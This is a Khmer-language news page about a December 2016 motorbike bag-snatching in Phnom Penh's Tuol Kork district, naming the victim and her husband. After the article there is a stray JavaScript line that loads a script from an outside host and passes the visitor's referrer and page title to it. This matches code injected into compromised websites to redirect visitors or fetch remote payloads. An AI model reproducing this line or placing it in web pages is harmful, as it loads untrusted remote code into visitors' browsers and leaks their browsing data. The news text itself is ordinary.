Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ចោរឆក់ក្នុងខណ្ឌទួលគោកទៀតហើយ ស្ត្រីម្នាក់អស់ទ្រព្យសម្បត្តិរលីងយំស្ទើរលែងចេញ

ភ្នំពេញ៖​ អង្គុយអស់សង្ឃឹមក្នុងទឹកដីនៃខណ្ឌទួលគោក ស្ត្រីម្នាក់អង្គុយច្រត់ចង្កា ស្ទើរគ្មានវាចារទ្រហ៊ោស្រែកយំលែងចង់ចេញ​អោយគេជួយ គ្រាដែលជិះម៉ូតូជាមួយប្តី ត្រូវលោកចោរមានគ្នា២នាក់ បានធ្វើសកម្មភាពឆក់កាបូបរូបគាត់យកទៅបាត់ ហើយគេចខ្លួនទៅបាត់ដោយសុវត្តិភាពមិនរំខានសមត្ថកិច្ចសោះឡើយ កាលពីវេលាម៉ោង៧និង៣០នាទី យប់ថ្ងៃទី២៦ ខែធ្នូ ឆ្នាំ២០១៦​ ខណ:ពួកគាត់ជាជនរងគ្រោះបើកតាមបណ្ដោយផ្លូវ២១៧ ក្នុងទិសដៅពីកើតទៅលិច លុះមកដល់ចំណុចជិតគុលស្ពានស្ទឹងមាន ជ័យ ក្នុងសង្កាត់បឺងសាឡាង​ នៃខណ្ឌទួលគោក  ត្រូវអស់ទ្រព្យសម្បត្តិរលីង​ ដោយជនសង្ស័យមានជិះម៉ូតូនិចមិនចាំស្លាកលេខ មកពីក្រោយ ឆក់កាបូកស្ពាយយកទៅបាត់។

តាមការរៀបរាប់ស្ទើរមិនចេញរបស់ស្ត្រីរងគ្រោះ និងគ្រួសារបានអោយដឹងថា ក្នុងកាបូបដែលចោរយកទៅនោះ មានមាសទំម្ងន់ ៥ជី លុយ១០០ដុល្លារ លុយខ្មែរ៥២ម៉ឺន ទូរស័ព្ទ២គ្រឿង កាតគ្រីម៉ូតូ១សន្លឹក និងអត្តសញ្ញាណប័ណ្ណ១សន្លឹក។

ស្ត្រីរងគ្រោះមានឈ្មោះប៊ិន ភា ភេទស្រី អាយុ៤០ឆ្នាំ ចំណែកប្តីមានឈ្មោះសុខ ជា ភេទប្រុស អាយុ៣៩ឆ្នាំ មុខរបររត់ម៉ូតូឌុប ទាំង ២នាក់ស្នាក់ផ្ទះជួល ក្រោយផ្សារស្ទឹងមានជ័យ ខណ្ឌមានជ័យ។ ក្រោយកើតហេតុជនរងគ្រោះបានត្រឹមតែទៅដាក់ពាក្យបណ្តឹងនៅនគរបាលរដ្ឋបាលសង្កាត់បឹងសាឡាងដើម្បីអោយសមត្ថកិច្ចធ្វើកំណត់ហេតុតែប៉ណ្ណោះ៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More